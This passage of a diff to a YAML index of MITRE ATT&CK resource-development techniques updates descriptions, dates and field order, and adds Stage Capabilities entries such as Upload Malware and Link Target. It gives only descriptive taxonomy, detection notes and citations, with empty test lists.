Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). - id: attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-19T03:09:34.771Z' - created: '2020-10-01T01:48:15.511Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. @@ -50832,10 +53687,6 @@ resource-development: [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1588.005: technique: @@ -50870,7 +53721,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Exploits description: |- - Before compromising a victim, adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying) + Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying) In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel) @@ -50882,7 +53733,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-18T21:47:09.385Z' + modified: '2021-04-15T03:14:01.255Z' created: '2020-10-01T02:17:46.086Z' x_mitre_detection: |2- @@ -50892,8 +53743,139 @@ resource-development: x_mitre_platforms: - PRE atomic_tests: [] + T1608.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.003 + url: https://attack.mitre.org/techniques/T1608/003 + - source_name: DigiCert Install SSL Cert + url: https://www.digicert.com/kb/ssl-certificate-installation.htm + description: DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved + April 19, 2021. + - source_name: Splunk Kovar Certificates 2017 + url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html + description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL + Certificates. Retrieved October 16, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Install Digital Certificate + description: "Adversaries may install SSL/TLS certificates that can be used + during targeting. SSL/TLS certificates are files that can be installed on + servers to enable secure communications between systems. Digital certificates + include information about the key, information about its owner's identity, + and the digital signature of an entity that has verified the certificate's + contents are correct. If the signature is valid, and the person examining + the certificate trusts the signer, then they know they can use that key to + communicate securely with its owner. Certificates can be uploaded to a server, + then the server can be configured to use the certificate to enable encrypted + communication with it.(Citation: DigiCert Install SSL Cert)\n\nAdversaries + may install SSL/TLS certificates that can be used to further their operations, + such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) + with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending + credibility to a credential harvesting site. Installation of digital certificates + may take place for a number of server types, including web servers and email + servers. \n\nAdversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) + or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). + Digital certificates can then be installed on adversary controlled infrastructure + that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) + or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))." + id: attack-pattern--c071d8c1-3b3a-4f22-9407-ca4e96921069 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-26T18:43:18.448Z' + created: '2021-03-17T20:32:13.793Z' + x_mitre_detection: |- + Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) + + Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1608.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.005 + url: https://attack.mitre.org/techniques/T1608/005 + - source_name: Malwarebytes Silent Librarian October 2020 + url: https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/ + description: Malwarebytes Threat Intelligence Team. (2020, October 14). Silent + Librarian APT right on schedule for 20/21 academic year. Retrieved February + 3, 2021. + - source_name: Proofpoint TA407 September 2019 + url: https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian + description: 'Proofpoint Threat Insight Team. (2019, September 5). Threat + Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Link Target + description: "Adversaries may put in place resources that are referenced by + a link that can be used during targeting. An adversary may rely upon a user + clicking a malicious link in order to divulge information (including credentials) + or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). + Links can be used for spearphishing, such as sending an email accompanied + by social engineering text to coax the user to actively click or copy and + paste a URL into a browser. Prior to a phish for information (as in [Spearphishing + Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial + access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), + an adversary must set up the resources for a link target for the spearphishing + link. \n\nTypically, the resources for a link target will be an HTML page + that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) + to decide what content to serve to the user. Adversaries may clone legitimate + sites to serve as the link target, this can include cloning of login pages + of legitimate web services or organization login pages in an effort to harvest + credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: + Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September + 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) + and have the link target point to malware for download/execution by the user.\n\nAdversaries + may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, + different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) + to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). + Link shortening services can also be employed." + id: attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-27T17:53:29.106Z' + created: '2021-03-17T20:35:08.429Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on other phases of the adversary lifecycle, such as + during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), + [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious + Link](https://attack.mitre.org/techniques/T1204/001). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] T1587.001: technique: + created: '2020-10-01T01:33:01.433Z' + modified: '2021-04-15T03:08:33.165Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0 + description: |- + Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB) + + As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware. + + Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29) + name: Malware + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1587.001 @@ -50920,30 +53902,13 @@ resource-development: description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.' url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Malware - description: |- - Before compromising a victim, adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors, packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB) - - As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware. - - Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29) - id: attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-22T13:05:43.492Z' - created: '2020-10-01T01:33:01.433Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1588.001: technique: @@ -50956,7 +53921,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Malware description: |- - Before compromising a victim, adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. + Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries). id: attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970 @@ -50964,7 +53929,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-15T20:46:54.437Z' + modified: '2021-04-15T03:14:41.582Z' created: '2020-10-01T02:06:11.499Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50998,7 +53963,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Obtain Capabilities description: |- - Before compromising a victim, adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle. + Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle. In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab) @@ -51008,7 +53973,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:22:21.135Z' + modified: '2021-04-15T03:15:21.193Z' created: '2020-10-01T01:56:24.776Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -51035,7 +54000,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Server description: |- - Before compromising a victim, adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. + Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet) id: attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337 @@ -51043,7 +54008,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-12T16:49:11.340Z' + modified: '2021-04-15T02:51:18.167Z' created: '2020-10-01T00:48:09.578Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -51065,7 +54030,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Server description: |- - Before compromising a victim, adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. + Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). id: attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5 @@ -51073,7 +54038,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-12T19:48:07.710Z' + modified: '2021-04-15T03:03:22.184Z' created: '2020-10-01T00:56:25.135Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -51102,32 +54067,30 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Social Media Accounts - description: "Before compromising a victim, adversaries may create and cultivate - social media accounts that can be used during targeting. Adversaries can create - social media accounts that can be used to build a persona to further operations. - Persona development consists of the development of public information, presence, - history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: - BlackHatRobinSage)\n\nFor operations incorporating social engineering, the - utilization of a persona on social media may be important. These personas - may be fictitious or impersonate real people. The persona may exist on a single - social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, - etc.). Establishing a persona on social media may require development of - additional documentation to make them seem real. This could include filling - out profile information, developing social networks, or incorporating photos. - \n\nOnce a persona has been developed an adversary can use it to create connections - to targets of interest. These connections may be direct or may include trying - to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) - These accounts may be leveraged during other phases of the adversary lifecycle, - such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))." + description: "Adversaries may create and cultivate social media accounts that + can be used during targeting. Adversaries can create social media accounts + that can be used to build a persona to further operations. Persona development + consists of the development of public information, presence, history and appropriate + affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor + operations incorporating social engineering, the utilization of a persona + on social media may be important. These personas may be fictitious or impersonate + real people. The persona may exist on a single social media site or across + multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona + \ on social media may require development of additional documentation to make + them seem real. This could include filling out profile information, developing + social networks, or incorporating photos. \n\nOnce a persona has been developed + an adversary can use it to create connections to targets of interest. These + connections may be direct or may include trying to connect through others.(Citation: + NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged + during other phases of the adversary lifecycle, such as during Initial Access + (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))." id: attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-20T17:58:13.557Z' + modified: '2021-04-15T03:10:35.708Z' created: '2020-10-01T01:08:41.124Z' - x_mitre_data_sources: - - Social media monitoring x_mitre_detection: |- Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. @@ -51159,20 +54122,19 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Social Media Accounts - description: "Before compromising a victim, adversaries may compromise social - media accounts that can be used during targeting. For operations incorporating - social engineering, the utilization of an online persona may be important. - Rather than creating and cultivating social media profiles (i.e. [Social Media - Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may - compromise existing social media accounts. Utilizing an existing persona may - engender a level of trust in a potential victim if they have a relationship, - or knowledge of, the compromised persona. \n\nA variety of methods exist for - compromising social media accounts, such as gathering credentials via [Phishing - for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials - from third-party sites, or by brute forcing credentials (ex: password reuse - from breach credential dumps).(Citation: AnonHBGary) Prior to compromising - social media accounts, adversaries may conduct Reconnaissance to inform decisions - about which accounts to compromise to further their operation.\n\nPersonas + description: "Adversaries may compromise social media accounts that can be used + during targeting. For operations incorporating social engineering, the utilization + of an online persona may be important. Rather than creating and cultivating + social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), + adversaries may compromise existing social media accounts. Utilizing an existing + persona may engender a level of trust in a potential victim if they have a + relationship, or knowledge of, the compromised persona. \n\nA variety of methods + exist for compromising social media accounts, such as gathering credentials + via [Phishing for Information](https://attack.mitre.org/techniques/T1598), + purchasing credentials from third-party sites, or by brute forcing credentials + (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior + to compromising social media accounts, adversaries may conduct Reconnaissance + to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing @@ -51187,10 +54149,8 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-20T17:57:43.708Z' + modified: '2021-04-15T02:59:06.872Z' created: '2020-10-01T01:18:35.535Z' - x_mitre_data_sources: - - Social media monitoring x_mitre_detection: |- Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization. @@ -51200,8 +54160,83 @@ resource-development: x_mitre_platforms: - PRE atomic_tests: [] + T1608: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608 + url: https://attack.mitre.org/techniques/T1608 + - source_name: Volexity Ocean Lotus November 2020 + url: https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/ + description: 'Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: + Extending Cyber Espionage Operations Through Fake Websites. Retrieved November + 20, 2020.' + - source_name: FireEye CFR Watering Hole 2012 + url: https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html + description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. + Retrieved December 18, 2020. + - source_name: Gallagher 2015 + description: Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking + group hacked 100+ websites to use as “watering holes”. Retrieved January + 25, 2016. + url: http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ + - source_name: ATT ScanBox + url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks + description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework + Used with Watering Hole Attacks. Retrieved October 19, 2020.' + - source_name: Malwarebytes Silent Librarian October 2020 + url: https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/ + description: Malwarebytes Threat Intelligence Team. (2020, October 14). Silent + Librarian APT right on schedule for 20/21 academic year. Retrieved February + 3, 2021. + - source_name: Proofpoint TA407 September 2019 + url: https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian + description: 'Proofpoint Threat Insight Team. (2019, September 5). Threat + Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.' + - source_name: DigiCert Install SSL Cert + url: https://www.digicert.com/kb/ssl-certificate-installation.htm + description: DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved + April 19, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Stage Capabilities + description: |- + Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) + + Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): + + * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) + * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) + * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) + * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) + id: attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-27T19:01:22.653Z' + created: '2021-03-17T20:04:09.331Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as initial access and post-compromise behaviors. + x_mitre_platforms: + - PRE + atomic_tests: [] T1588.002: technique: + id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0 + description: |- + Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019) + + Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries). + name: Tool + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1588.002 @@ -51210,24 +54245,92 @@ resource-development: url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Tool - description: |- - Before compromising a victim, adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019) - - Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries). - id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-20T14:46:37.477Z' + modified: '2021-04-15T03:15:20.491Z' created: '2020-10-01T02:08:33.977Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle. + atomic_tests: [] + T1608.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.001 + url: https://attack.mitre.org/techniques/T1608/001 + - source_name: Volexity Ocean Lotus November 2020 + url: https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/ + description: 'Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: + Extending Cyber Espionage Operations Through Fake Websites. Retrieved November + 20, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Upload Malware + description: |- + Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. + + Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) + + Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files. + id: attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e + type: attack-pattern + 